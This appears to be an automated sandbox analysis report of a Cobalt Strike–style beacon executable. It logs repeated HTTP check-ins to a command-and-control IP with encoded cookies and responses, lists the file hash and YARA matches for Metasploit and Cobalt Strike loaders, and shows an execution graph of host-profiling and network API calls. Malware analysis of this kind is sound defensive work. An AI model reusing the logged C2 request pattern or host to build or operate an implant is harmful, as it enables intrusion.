        Data Raw: 6b 7a 36 44 55 46 42 34 33 65 59 57 72 52 74 31 51 56 78 79 54 7a 78 6c 4b 6c 74 34 59 47 74 49 45 47 58 55 6f 69 39 58 76 44 79 53 44 56 5a 54 79 33 79 32 66 71 53 52 47 68 53 4d 67 2b 73 72 78 72 75 48 6b 65 2b 6a 4b 77 70 4d 4c 6d 77 45 72 55 49 61 6a 55 4e 6c 4a 52 6d 76 64 77 74 72 44 6d 66 7a 58 36 55 74 4e 7a 6e 6a 37 65 32 33 45 2f 57 32 48 69 48 2b 72 56 43 70 69 77 69 42 74 69 35 37 31 62 2b 73 42 6a 78 43 4a 70 55 2b 41 37 42 44 52 42 48 44 76 38 52 45 55 70 31 73 6a 78 6f 75 7a 51 56 2b 4e 6e 61 48 75 47 44 56 7a 46 4e 43 73 78 4a 75 59 46 66 5a 44 70 79 61
        Data Ascii: kz6DUFB43eYWrRt1QVxyTzxlKlt4YGtIEGXUoi9XvDySDVZTy3y2fqSRGhSMg+srxruHke+jKwpMLmwErUIajUNlJRmvdwtrDmfzX6UtNznj7e23E/W2HiH+rVCpiwiBti571b+sBjxCJpU+A7BDRBHDv8REUp1sjxouzQV+NnaHuGDVzFNCsxJuYFfZDpya


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        12192.168.2.5499888.148.6.140802952C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:36:08.911976099 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:36:09.860977888 CET505INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:36:09 GMT
        Server: nginx
        Content-Length: 320
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Data Raw: 6b 6a 6a 48 6d 53 59 2b 6c 58 4e 4a 32 2f 51 76 76 62 42 4c 34 57 74 69 65 51 2f 7a 55 4c 69 6d 70 64 6b 61 32 76 43 77 78 41 57 78 72 55 49 71 49 36 46 70 41 30 33 64 65 58 6b 71 57 56 4f 75 6d 6a 53 39 58 59 72 2f 50 52 42 48 64 35 54 6c 34 34 47 43 65 36 4e 63 74 4f 79 42 37 78 50 31 6c 37 43 34 65 51 56 6d 63 56 34 6d 61 36 66 75 42 4b 58 74 59 6c 58 4e 50 6c 64 2f 37 64 6d 66 45 63 77 50 54 46 41 67 69 7a 33 48 71 4d 6d 33 52 35 43 51 41 32 52 52 65 65 43 45 68 53 49 70 49 4b 59 57 4b 4d 6b 31 76 34 51 43 6a 78 30 75 6a 77 62 55 41 31 53 69 44 62 31 56 52 30 67 6c 71 75 58 6b 44 63 35 6b 4a 52 56 37 6c 76 59 66 6f 73 32 65 78 64 33 77 4a 69 39 69 4f 55 50 4c 55 72 56 52 36 45 6f 32 44 72 41 74 77 65 30 43 51 53 7a 64 44 57 6e 4a 78 64 54 6d 50 62 50 64 63 74 59 36 6f 79 42 71 65 41 36 62 53 47 30 45 4c 62 47 44 47 5a 6c 64 68 66 52 65 48 74 65 36 49 6e 6e 7a 33 6a 63 38 77 56 68 67 5a 64 44 65 56 36 72 44 56 6c 51 59 4b 75 74 49 4f 72 31 4d
        Data Ascii: kjjHmSY+lXNJ2/QvvbBL4WtieQ/zULimpdka2vCwxAWxrUIqI6FpA03deXkqWVOumjS9XYr/PRBHd5Tl44GCe6NctOyB7xP1l7C4eQVmcV4ma6fuBKXtYlXNPld/7dmfEcwPTFAgiz3HqMm3R5CQA2RReeCEhSIpIKYWKMk1v4QCjx0ujwbUA1SiDb1VR0glquXkDc5kJRV7lvYfos2exd3wJi9iOUPLUrVR6Eo2DrAtwe0CQSzdDWnJxdTmPbPdctY6oyBqeA6bSG0ELbGDGZldhfReHte6Innz3jc8wVhgZdDeV6rDVlQYKutIOr1M


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        13192.168.2.5499898.148.6.140802952C:\Users\user\Desktop\beacon_x86.exe
        TimestampBytes transferredDirectionData
        Jan 10, 2025 09:36:18.569010973 CET544OUTGET /api/v1/get HTTP/1.1
        Content-Type: text/plain
        Accept: */*
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        Accept-Encoding: gzip, deflate
        Priority: u=1, i
        Cookie: _UK=gd3f9vAfNwTV60ENNBgjYsnEyQYTGVo96xMpZjhBpFuR7qjrTTQ9Y0QV3LkxS8ljwTHIU/cP4Ie0XKdPlpL3SPxZHyYZ7RFdNtIimS7gRzpKO+wsEVbyMbrod2jQyDlHWnoyNYamQ9g1MxzWesxfQZcX689JHO4ne6CdN2exZdU=
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
        Host: 8.148.6.140
        Connection: Keep-Alive
        Cache-Control: no-cache
        Jan 10, 2025 09:36:19.533714056 CET185INHTTP/1.1 200 OK
        Date: Fri, 10 Jan 2025 08:36:19 GMT
        Server: nginx
        Content-Length: 216
        Connection: keep-alive
        Content-Type: text/plain
        Cache-Control: no-cache
        Pragma: no-cache
        Jan 10, 2025 09:36:19.533763885 CET216INData Raw: 56 59 4e 66 2f 2b 66 76 6b 70 4c 55 69 4e 63 74 56 73 32 67 77 6c 61 45 41 66 35 4c 43 74 54 4a 61 68 34 48 43 2b 39 38 4e 36 4a 6d 63 51 51 61 36 71 4f 70 42 58 78 2f 37 2f 75 54 6c 4e 2f 4f 58 43 4c 6e 51 65 4c 4c 64 6c 33 6a 4a 39 69 5a 72 58
        Data Ascii: VYNf/+fvkpLUiNctVs2gwlaEAf5LCtTJah4HC+98N6JmcQQa6qOpBXx/7/uTlN/OXCLnQeLLdl3jJ9iZrXeJagXf/k7ksHWawJ0irjS3eKkMXSAxYL9hq3wx0pHz4MS7PJ2D7prPaaY2h/FXSAzUwvPLBU2FrRKDuOCjuTp5J81WTB0cDBoAo//w62MfoDBg+6AtEHs7ezPE5OX6TwIjLQ==


        Click to jump to process

        Click to jump to process

        Target ID:0
        Start time:03:33:13
        Start date:10/01/2025
        Path:C:\Users\user\Desktop\beacon_x86.exe
        Wow64 process (32bit):true
        Commandline:"C:\Users\user\Desktop\beacon_x86.exe"
        Imagebase:0x400000
        File size:324'096 bytes
        MD5 hash:BFFE5DBE4D4ECECC6652360CE37B8075
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Yara matches:
        • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000002.3890591328.0000000000D97000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000002.3890591328.0000000000D97000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000003.2049538044.0000000000D20000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Metasploit_7bc0f998, Description: Identifies the API address lookup function leverage by metasploit shellcode, Source: 00000000.00000003.2049538044.0000000000D20000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
        • Rule: Windows_Trojan_Metasploit_c9773203, Description: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., Source: 00000000.00000003.2049538044.0000000000D20000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
        • Rule: Trojan_Raw_Generic_4, Description: unknown, Source: 00000000.00000003.2049538044.0000000000D20000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
        Reputation:low
        Has exited:false

        Reset < >

          Execution Graph

          Execution Coverage:4.6%
          Dynamic/Decrypted Code Coverage:88.8%
          Signature Coverage:13.9%
          Total number of Nodes:747
          Total number of Limit Nodes:20
          execution_graph 21445 401441 _cexit 21548 d68ed4 158 API calls 21549 d826dc RtlUnwind 21446 d608d3 99 API calls 6 library calls 21550 402242 signal 20645 d69877 241 API calls ___DllMainCRTStartup 21552 401a5c 12 API calls 21556 d7d2ff 81 API calls 2 library calls 21558 d7a976 73 API calls 10 library calls 21450 d684fd 107 API calls ___DllMainCRTStartup 21559 d68ef8 105 API calls 21560 d68ee5 Sleep 21451 40246a EnterCriticalSection TlsGetValue GetLastError LeaveCriticalSection 21452 d648e0 158 API calls ___DllMainCRTStartup 21453 d68cee 173 API calls 21454 d61896 HttpAddRequestHeadersA ___DllMainCRTStartup 21455 401001 __set_app_type __p__fmode __set_app_type __setusermatherr 21563 d60a81 153 API calls 21564 d7068a 63 API calls 21565 d68e89 99 API calls 21462 401426 GetStartupInfoA 21463 d690b1 104 API calls 21464 402408 free LeaveCriticalSection 21566 d68eb1 48 API calls 21568 d692b8 htonl htonl _memset ___DllMainCRTStartup 21468 d668a8 99 API calls 21470 d69057 133 API calls 21571 d68e59 104 API calls 21471 d69047 105 API calls 21473 d82c4e 48 API calls 6 library calls 21474 d6404d 77 API calls 3 library calls 21573 d68e49 112 API calls 21574 d68e79 101 API calls 21480 d69017 100 API calls 21481 d66415 98 API calls ___DllMainCRTStartup 21482 d69007 100 API calls 21579 d82a09 46 API calls __locking 21580 401296 15 API calls 21484 40107a __p__fmode __set_app_type __setusermatherr 21485 d66c08 PeekNamedPipe Sleep 21486 4014a0 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 21583 d60a39 76 API calls 21584 d68e39 114 API calls 21488 d69027 99 API calls 21585 d68e25 109 API calls 21489 d64821 173 API calls 2 library calls 21587 d7d220 SetLastError __locking 21588 d68e2f 101 API calls 21589 d683d3 100 API calls ___DllMainCRTStartup 21491 d66ddf shutdown closesocket 21492 d68ddc 175 API calls 21493 d7cddd 47 API calls 3 library calls 21590 d68fdc 176 API calls 20646 d795dc 20647 d795e7 20646->20647 20648 d795ec 20646->20648 20664 d80da8 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 20647->20664 20652 d794e6 20648->20652 20651 d795fa 20655 d794f2 __locking 20652->20655 20653 d7953f 20662 d7958f __locking 20653->20662 20714 d69802 20653->20714 20655->20653 20655->20662 20665 d793b1 20655->20665 20656 d79552 20658 d7956f 20656->20658 20659 d69802 ___DllMainCRTStartup 254 API calls 20656->20659 20660 d793b1 __CRT_INIT@12 95 API calls 20658->20660 20658->20662 20661 d79566 20659->20661 20660->20662 20663 d793b1 __CRT_INIT@12 95 API calls 20661->20663 20662->20651 20663->20658 20664->20648 20666 d793c0 20665->20666 20667 d7943c 20665->20667 20732 d7968a HeapCreate 20666->20732 20669 d79473 20667->20669 20677 d79442 20667->20677 20670 d794d1 20669->20670 20671 d79478 20669->20671 20675 d793cb 20670->20675 20767 d7c8e0 47 API calls 2 library calls 20670->20767 20746 d7c5c6 TlsGetValue 20671->20746 20674 d793d2 20734 d7c94e 49 API calls 8 library calls 20674->20734 20675->20653 20676 d7945d 20676->20675 20744 d7f145 46 API calls ___wtomb_environ 20676->20744 20677->20675 20677->20676 20743 d77f0a 45 API calls _doexit 20677->20743 20683 d793d7 __RTC_Initialize 20686 d793db 20683->20686 20690 d793e7 GetCommandLineA 20683->20690 20685 d79489 20685->20675 20752 d7c54b Sleep GetModuleHandleW GetModuleHandleW GetProcAddress __crt_waiting_on_module_handle 20685->20752 20735 d796ba VirtualFree HeapDestroy 20686->20735 20687 d79467 20745 d7c5fa 5 API calls __decode_pointer 20687->20745 20736 d80c71 50 API calls 2 library calls 20690->20736 20692 d793e0 20692->20675 20696 d794a7 20700 d794c5 20696->20700 20701 d794ae 20696->20701 20697 d793f7 20737 d7eef1 50 API calls 3 library calls 20697->20737 20699 d79401 20703 d79405 20699->20703 20739 d80bb6 66 API calls 3 library calls 20699->20739 20754 d77722 20700->20754 20753 d7c637 45 API calls 5 library calls 20701->20753 20738 d7c5fa 5 API calls __decode_pointer 20703->20738 20707 d794b5 GetCurrentThreadId 20707->20675 20708 d79411 20709 d79425 20708->20709 20740 d8093e 65 API calls 6 library calls 20708->20740 20709->20692 20742 d7f145 46 API calls ___wtomb_environ 20709->20742 20712 d7941a 20712->20709 20741 d77d2d 52 API calls 5 library calls 20712->20741 20715 d698b0 20714->20715 20719 d69812 ___DllMainCRTStartup 20714->20719 20854 d6b35d 72 API calls 3 library calls 20715->20854 20717 d698b8 20718 d69817 ___DllMainCRTStartup 20717->20718 20718->20656 20719->20718 20728 d69895 20719->20728 20773 d6cae1 20719->20773 20722 d69850 20723 d69897 20722->20723 20724 d6985f 20722->20724 20722->20728 20723->20728 20853 d6ca6f GetCurrentProcess GetCurrentProcess UnmapViewOfFile ___DllMainCRTStartup 20723->20853 20725 d6987c 20724->20725 20726 d69873 HeapDestroy 20724->20726 20724->20728 20780 d6c492 20725->20780 20726->20725 20726->20728 20786 d6031c 20728->20786 20731 d6c492 ___DllMainCRTStartup 2 API calls 20731->20728 20733 d793c6 20732->20733 20733->20674 20733->20675 20734->20683 20735->20692 20736->20697 20737->20699 20739->20708 20740->20712 20741->20709 20742->20703 20743->20676 20744->20687 20747 d7947d 20746->20747 20748 d7c5db 20746->20748 20751 d80852 45 API calls __calloc_crt 20747->20751 20768 d7c54b Sleep GetModuleHandleW GetModuleHandleW GetProcAddress __crt_waiting_on_module_handle 20748->20768 20750 d7c5e6 TlsSetValue 20750->20747 20751->20685 20752->20696 20753->20707 20756 d7772e __locking 20754->20756 20755 d7776d 20757 d777a7 __locking __dosmaperr 20755->20757 20758 d77782 HeapFree 20755->20758 20756->20755 20756->20757 20769 d798aa 45 API calls 2 library calls 20756->20769 20757->20692 20758->20757 20760 d77794 20758->20760 20772 d79641 45 API calls __getptd_noexit 20760->20772 20761 d77745 ___sbh_find_block 20764 d7775f 20761->20764 20770 d7990d HeapFree 20761->20770 20763 d77799 GetLastError 20763->20757 20771 d77778 RtlLeaveCriticalSection _doexit 20764->20771 20767->20675 20768->20750 20769->20761 20770->20764 20771->20755 20772->20763 20774 d6caee 20773->20774 20775 d6cb6c VirtualQuery 20773->20775 20774->20775 20776 d6cb37 GetCurrentProcess 20774->20776 20777 d6cb1a GetCurrentProcess 20774->20777 20775->20722 20778 d6cb34 ___DllMainCRTStartup 20776->20778 20777->20778 20778->20775 20779 d6cb67 20778->20779 20779->20722 20781 d6c51e VirtualFree 20780->20781 20782 d6c4a2 20780->20782 20783 d69887 20781->20783 20782->20781 20784 d6c4c1 GetCurrentProcess 20782->20784 20783->20728 20783->20731 20785 d6c4d9 ___DllMainCRTStartup 20784->20785 20785->20781 20785->20783 20855 d671bc 20786->20855 20788 d60332 ___DllMainCRTStartup 20862 d777ff 20788->20862 20790 d603b7 ___DllMainCRTStartup 20880 d6bb1c 20790->20880 20796 d6040b 20797 d6da37 ___DllMainCRTStartup 50 API calls 20796->20797 20798 d6041d 20797->20798 20907 d6286e 20798->20907 20800 d60425 20801 d60429 20800->20801 20803 d6042e ___DllMainCRTStartup 20800->20803 21004 d6ce47 65 API calls ___DllMainCRTStartup 20801->21004 20804 d60443 20803->20804 20805 d60448 20803->20805 21005 d6ce47 65 API calls ___DllMainCRTStartup 20804->21005 20912 d628cc 20805->20912 20809 d60456 20918 d62927 20809->20918 20810 d60451 21006 d6ce47 65 API calls ___DllMainCRTStartup 20810->21006 20814 d6045f 21007 d6ce47 65 API calls ___DllMainCRTStartup 20814->21007 20816 d60464 ___DllMainCRTStartup 20817 d777ff _malloc 45 API calls 20816->20817 20818 d6048b 20817->20818 20819 d60496 20818->20819 20820 d6049b ___DllMainCRTStartup 20818->20820 21008 d6ce47 65 API calls ___DllMainCRTStartup 20819->21008 20822 d6da37 ___DllMainCRTStartup 50 API calls 20820->20822 20823 d604ae ___DllMainCRTStartup 20822->20823 20930 d67060 GetACP GetOEMCP 20823->20930 20825 d606ac 21019 d6bea0 45 API calls ___wtomb_environ 20825->21019 20827 d606b5 20828 d77722 ___wtomb_environ 45 API calls 20827->20828 20829 d606be 20828->20829 21020 d6ce47 65 API calls ___DllMainCRTStartup 20829->21020 20830 d6bdfa 46 API calls ___DllMainCRTStartup 20846 d604c0 ___DllMainCRTStartup 20830->20846 20832 d606c4 20832->20718 20833 d77956 73 API calls __snprintf 20833->20846 20846->20825 20846->20830 20846->20833 20848 d6286e GetLocalTime ___DllMainCRTStartup 20846->20848 20851 d60606 20846->20851 20968 d6173c 20846->20968 20977 d61e3d 20846->20977 20984 d67fa1 20846->20984 20991 d6200f 20846->20991 20994 d644a0 20846->20994 21009 d65072 45 API calls 6 library calls 20846->21009 21010 d6acc5 99 API calls 3 library calls 20846->21010 21011 d6936c htonl htonl _memset ___DllMainCRTStartup 20846->21011 21012 d63f55 113 API calls 2 library calls 20846->21012 21013 d66853 99 API calls ___DllMainCRTStartup 20846->21013 21014 d66017 106 API calls 4 library calls 20846->21014 21015 d61fb7 98 API calls ___DllMainCRTStartup 20846->21015 20848->20846 20850 d6173c ___DllMainCRTStartup 4 API calls 20850->20851 20851->20846 20851->20850 21016 d61962 88 API calls 3 library calls 20851->21016 21017 d6ce47 65 API calls ___DllMainCRTStartup 20851->21017 21018 d6ce47 65 API calls ___DllMainCRTStartup 20851->21018 20853->20728 20854->20717 20856 d777ff _malloc 45 API calls 20855->20856 20857 d671c7 20856->20857 20858 d777ff _malloc 45 API calls 20857->20858 20861 d671e4 _memset ___DllMainCRTStartup 20857->20861 20859 d671d7 20858->20859 20860 d77722 ___wtomb_environ 45 API calls 20859->20860 20859->20861 20860->20861 20861->20788 20863 d778b2 20862->20863 20873 d77811 20862->20873 21028 d7a77f Sleep GetModuleHandleW GetModuleHandleW GetProcAddress __decode_pointer 20863->21028 20865 d778b8 21029 d79641 45 API calls __getptd_noexit 20865->21029 20870 d7786e RtlAllocateHeap 20870->20873 20871 d77822 20871->20873 21021 d7a737 45 API calls 2 library calls 20871->21021 21022 d7a58c 45 API calls 7 library calls 20871->21022 21023 d77cc2 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 20871->21023 20873->20870 20873->20871 20874 d7789e 20873->20874 20877 d778a3 20873->20877 20879 d778aa 20873->20879 21024 d777b0 45 API calls 4 library calls 20873->21024 21025 d7a77f Sleep GetModuleHandleW GetModuleHandleW GetProcAddress __decode_pointer 20873->21025 21026 d79641 45 API calls __getptd_noexit 20874->21026 21027 d79641 45 API calls __getptd_noexit 20877->21027 20879->20790 21030 d78e8e GetSystemTimeAsFileTime 20880->21030 20882 d6bb2d 21032 d77c0a 20882->21032 20885 d777ff _malloc 45 API calls 20886 d6bb76 _memset 20885->20886 21035 d790d5 20886->21035 20888 d6bbe2 20889 d790d5 _strtok 45 API calls 20888->20889 20892 d603f0 20889->20892 20890 d6bbb9 20890->20888 20891 d790d5 _strtok 45 API calls 20890->20891 20891->20890 20893 d64c3e 20892->20893 20894 d78e8e __time64 GetSystemTimeAsFileTime 20893->20894 20895 d64c50 20894->20895 20896 d77c0a ___DllMainCRTStartup 45 API calls 20895->20896 20897 d64c57 ___DllMainCRTStartup 20896->20897 21073 d64cc4 20897->21073 20900 d6da37 20901 d6da50 20900->20901 20906 d6da63 _memset 20900->20906 20902 d6da65 20901->20902 20903 d6da59 20901->20903 21078 d79196 50 API calls 10 library calls 20902->21078 20904 d777ff _malloc 45 API calls 20903->20904 20904->20906 20906->20796 20908 d6287c ___DllMainCRTStartup 20907->20908 20909 d62882 GetLocalTime 20908->20909 20910 d62880 20908->20910 20911 d62894 ___DllMainCRTStartup 20909->20911 20910->20800 20911->20800 20913 d628d7 ___DllMainCRTStartup 20912->20913 20917 d6044d 20913->20917 21079 d6b0d3 79 API calls ___DllMainCRTStartup 20913->21079 20915 d6290f 21080 d6b0fd 73 API calls 3 library calls 20915->21080 20917->20809 20917->20810 20920 d6293e ___DllMainCRTStartup 20918->20920 20919 d6045b 20919->20814 20919->20816 20920->20919 20921 d62980 htonl htonl 20920->20921 20921->20919 20922 d629a0 20921->20922 20923 d777ff _malloc 45 API calls 20922->20923 20924 d629a9 ___DllMainCRTStartup 20923->20924 20925 d629f3 _memset 20924->20925 21081 d6b0d3 79 API calls ___DllMainCRTStartup 20924->21081 20928 d77722 ___wtomb_environ 45 API calls 20925->20928 20927 d629e1 21082 d6b0fd 73 API calls 3 library calls 20927->21082 20928->20919 21083 d6dfea 20930->21083 20936 d77c0a ___DllMainCRTStartup 45 API calls 20937 d670b4 20936->20937 21095 d60311 20937->21095 20939 d670ba __RTC_InitBase 20940 d670d3 GetCurrentProcess 20939->20940 20941 d670cd 20939->20941 21156 d63354 GetModuleHandleA GetProcAddress 20940->21156 21098 d6d442 AllocateAndInitializeSid 20941->21098 20943 d670df 20943->20941 20947 d67103 21106 d6142d 20947->21106 20950 d6142d ___DllMainCRTStartup htonl 20951 d6711f 20950->20951 20952 d6142d ___DllMainCRTStartup htonl 20951->20952 20953 d6712c 20952->20953 21110 d613de htonl 20953->21110 20956 d613de ___DllMainCRTStartup 2 API calls 20957 d67141 20956->20957 21113 d613fb 20957->21113 20965 d67162 _memset ___DllMainCRTStartup 21149 d6af60 20965->21149 20967 d671a7 _memset 20967->20846 21296 d6cec2 20968->21296 20970 d617bf InternetOpenA 20972 d617cd InternetConnectA 20970->20972 20971 d61751 ___DllMainCRTStartup 20971->20970 20971->20972 20976 d6181f ___DllMainCRTStartup 20972->20976 21299 d6cee3 20976->21299 20978 d6cec2 ___DllMainCRTStartup RevertToSelf 20977->20978 20979 d61e46 20978->20979 21302 d61c3f 20979->21302 20982 d6cee3 ___DllMainCRTStartup ImpersonateLoggedOnUser 20983 d61e5e 20982->20983 20983->20846 21359 d67b1a 20984->21359 20987 d67fa9 20988 d67fc8 20987->20988 21387 d67e51 20987->21387 21398 d67db3 48 API calls ___wtomb_environ 20988->21398 20990 d67fcd 20990->20846 20992 d6dfea ___DllMainCRTStartup 3 API calls 20991->20992 20993 d6201e 20992->20993 20993->20846 20996 d644ac ___DllMainCRTStartup 20994->20996 20995 d644f8 Sleep 21002 d644f3 20995->21002 20996->20995 20997 d644d0 20996->20997 21422 d64519 127 API calls 2 library calls 20996->21422 21408 d64657 20997->21408 21000 d644c7 21000->20995 21000->20997 21002->20846 21004->20803 21005->20805 21006->20809 21007->20816 21008->20820 21009->20846 21010->20846 21011->20846 21012->20846 21013->20846 21014->20846 21015->20846 21016->20851 21017->20846 21018->20846 21019->20827 21020->20832 21021->20871 21022->20871 21024->20873 21025->20873 21026->20877 21027->20879 21028->20865 21029->20879 21031 d78ebe __aulldiv 21030->21031 21031->20882 21040 d7c797 21032->21040 21036 d7c797 __getptd 45 API calls 21035->21036 21037 d790f8 21036->21037 21064 d7f331 21037->21064 21039 d79194 21039->20890 21045 d7c71e GetLastError 21040->21045 21042 d7c79f 21043 d6bb33 21042->21043 21060 d77c6e 45 API calls 3 library calls 21042->21060 21043->20885 21046 d7c5c6 ___set_flsgetvalue 6 API calls 21045->21046 21047 d7c735 21046->21047 21048 d7c73d 21047->21048 21049 d7c78b SetLastError 21047->21049 21061 d80852 45 API calls __calloc_crt 21048->21061 21049->21042 21051 d7c749 21051->21049 21062 d7c54b Sleep GetModuleHandleW GetModuleHandleW GetProcAddress __crt_waiting_on_module_handle 21051->21062 21053 d7c763 21054 d7c782 21053->21054 21055 d7c76a 21053->21055 21057 d77722 ___wtomb_environ 42 API calls 21054->21057 21063 d7c637 45 API calls 5 library calls 21055->21063 21059 d7c788 21057->21059 21058 d7c772 GetCurrentThreadId 21058->21049 21059->21049 21060->21043 21061->21051 21062->21053 21063->21058 21065 d7f33b IsDebuggerPresent 21064->21065 21066 d7f339 21064->21066 21072 d81865 21065->21072 21066->21039 21069 d831bf SetUnhandledExceptionFilter UnhandledExceptionFilter 21070 d831e4 GetCurrentProcess TerminateProcess 21069->21070 21071 d831dc __invoke_watson 21069->21071 21070->21039 21071->21070 21072->21069 21074 d603f9 21073->21074 21076 d64cd6 ___DllMainCRTStartup 21073->21076 21074->20900 21075 d777ff _malloc 45 API calls 21075->21076 21076->21074 21076->21075 21077 d6da37 ___DllMainCRTStartup 50 API calls 21076->21077 21077->21076 21078->20906 21079->20915 21080->20917 21081->20927 21082->20925 21157 d6df82 21083->21157 21086 d67090 21088 d6aecf 21086->21088 21089 d6aee1 ___DllMainCRTStartup 21088->21089 21164 d70270 21089->21164 21091 d6aefd ___DllMainCRTStartup 21094 d67099 GetTickCount 21091->21094 21170 d86320 21091->21170 21175 d77ede 45 API calls _doexit 21091->21175 21094->20936 21096 d6200f ___DllMainCRTStartup 3 API calls 21095->21096 21097 d60316 21096->21097 21097->20939 21099 d6d482 CheckTokenMembership 21098->21099 21100 d670ed 21098->21100 21101 d6d497 FreeSid 21099->21101 21102 d6d494 21099->21102 21103 d613a9 21100->21103 21101->21100 21102->21101 21104 d862d6 21103->21104 21105 d613b8 htonl 21104->21105 21105->20947 21107 d6145e 21106->21107 21108 d6143c 21106->21108 21107->20950 21109 d6144a htonl 21108->21109 21109->21107 21111 d6142d ___DllMainCRTStartup htonl 21110->21111 21112 d613f8 21111->21112 21112->20956 21114 d61406 21113->21114 21115 d6142d ___DllMainCRTStartup htonl 21114->21115 21116 d61418 21115->21116 21117 d6141b 21116->21117 21118 d6142d ___DllMainCRTStartup htonl 21117->21118 21119 d6142a 21118->21119 21120 d66f09 21119->21120 21121 d671bc ___DllMainCRTStartup 45 API calls 21120->21121 21122 d66f1c ___DllMainCRTStartup 21121->21122 21123 d66f5e GetUserNameA GetComputerNameA 21122->21123 21177 d61f10 21123->21177 21126 d66f9c _strrchr 21127 d66fb9 GetVersionExA 21126->21127 21128 d6141b ___DllMainCRTStartup htonl 21127->21128 21129 d66fd6 21128->21129 21130 d6141b ___DllMainCRTStartup htonl 21129->21130 21131 d66fe1 21130->21131 21132 d613fb ___DllMainCRTStartup htonl 21131->21132 21133 d66fec 21132->21133 21134 d613de ___DllMainCRTStartup 2 API calls 21133->21134 21135 d66ff4 21134->21135 21136 d613de ___DllMainCRTStartup 2 API calls 21135->21136 21137 d67000 21136->21137 21138 d613de ___DllMainCRTStartup 2 API calls 21137->21138 21139 d6700c 21138->21139 21140 d613de ___DllMainCRTStartup 2 API calls 21139->21140 21141 d67015 21140->21141 21180 d77956 21141->21180 21144 d6142d ___DllMainCRTStartup htonl 21145 d67051 21144->21145 21195 d67207 21145->21195 21148 d61468 htonl 21148->20965 21150 d6af71 ___DllMainCRTStartup 21149->21150 21220 d6fcd9 21150->21220 21152 d6af9d 21155 d6afc8 21152->21155 21244 d701a5 21152->21244 21248 d77ede 45 API calls _doexit 21152->21248 21155->20967 21156->20943 21158 d6dfa7 21157->21158 21159 d6dfc2 CryptGenRandom 21158->21159 21162 d6dfbe 21158->21162 21160 d6dfe6 21159->21160 21161 d6dfd7 CryptReleaseContext 21159->21161 21160->21161 21161->21162 21162->21086 21163 d6df0c GetSystemTimeAsFileTime _clock 21162->21163 21163->21086 21165 d7027b ___DllMainCRTStartup 21164->21165 21166 d7028f 21165->21166 21167 d777ff _malloc 45 API calls 21165->21167 21166->21091 21169 d7029e 21167->21169 21168 d77722 ___wtomb_environ 45 API calls 21168->21166 21169->21166 21169->21168 21173 d86344 ___DllMainCRTStartup 21170->21173 21172 d86b1f 21172->21091 21174 d86960 21173->21174 21176 d87df9 19 API calls _RTC_Failure 21173->21176 21174->21091 21175->21091 21176->21172 21201 d61f1b 21177->21201 21181 d77966 21180->21181 21182 d77983 21180->21182 21214 d79641 45 API calls __getptd_noexit 21181->21214 21184 d779af 21182->21184 21186 d77992 21182->21186 21218 d7a90b 73 API calls 12 library calls 21184->21218 21185 d7796b 21215 d7b5da 4 API calls 2 library calls 21185->21215 21216 d79641 45 API calls __getptd_noexit 21186->21216 21190 d77997 21217 d7b5da 4 API calls 2 library calls 21190->21217 21191 d6702d 21191->21144 21193 d779dd 21193->21191 21219 d7a7a7 71 API calls 6 library calls 21193->21219 21196 d67215 ___DllMainCRTStartup 21195->21196 21197 d77722 ___wtomb_environ 45 API calls 21196->21197 21198 d6721c 21197->21198 21199 d77722 ___wtomb_environ 45 API calls 21198->21199 21200 d6705a 21199->21200 21200->21148 21208 d61e6e 21201->21208 21203 d61f36 WSASocketA 21204 d61f50 WSAIoctl 21203->21204 21205 d61f18 GetModuleFileNameA 21203->21205 21206 d61f74 closesocket 21204->21206 21205->21126 21206->21205 21209 d61e83 WSAStartup 21208->21209 21212 d61ea5 ___DllMainCRTStartup 21208->21212 21210 d61e99 WSACleanup 21209->21210 21209->21212 21213 d77ede 45 API calls _doexit 21210->21213 21212->21203 21213->21212 21214->21185 21216->21190 21218->21193 21219->21191 21249 d7099b 21220->21249 21226 d6fdd8 21227 d6fe67 21226->21227 21229 d6fde3 21226->21229 21228 d77722 ___wtomb_environ 45 API calls 21227->21228 21230 d6fe6f 21228->21230 21261 d70e70 45 API calls 3 library calls 21229->21261 21262 d70e70 45 API calls 3 library calls 21230->21262 21233 d6fe85 21239 d6fea6 21233->21239 